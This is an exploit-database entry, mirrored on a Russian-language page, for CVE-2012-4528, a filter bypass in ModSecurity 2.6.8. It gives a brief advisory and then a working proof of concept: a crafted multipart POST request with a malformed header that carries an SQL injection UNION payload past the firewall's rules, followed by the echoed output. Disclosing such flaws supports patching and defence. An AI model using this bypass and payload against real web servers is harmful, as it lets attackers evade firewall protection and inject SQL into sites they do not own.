- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 37949
- Проверка EDB
-
- Пройдено
- Автор
- BERNHARD MUELLER
- Тип уязвимости
- REMOTE
- Платформа
- LINUX
- CVE
- cve-2012-4528
- Дата публикации
- 2012-10-17
ModSecurity - 'POST' Security Bypass
Код:
source: https://www.securityfocus.com/bid/56096/info
ModSecurity is prone to a security-bypass vulnerability because it fails to sufficiently sanitize user-supplied input.
Successful exploits can allow attackers to bypass filtering rules; this may aid in further attacks.
ModSecurity 2.6.8 is vulnerable; other versions may also be affected.
Proof of concept:
-----------------
wut.php:
--------
<? echo $POST[xxx] ?>
POST request:
-------------
POST /wut.php HTTP/1.1
Content-Type: multipart/form-data; boundary=A
Content-Length: 161
--A
Content-Disposition: form-data; name="xxx"[\r][\r][\n]
--A
Content-Disposition: form-data; name="yyy"; filename="z"
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
--A--
Output:
-------
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
(any change in the header should produce a 403)d- Источник
- www.exploit-db.com
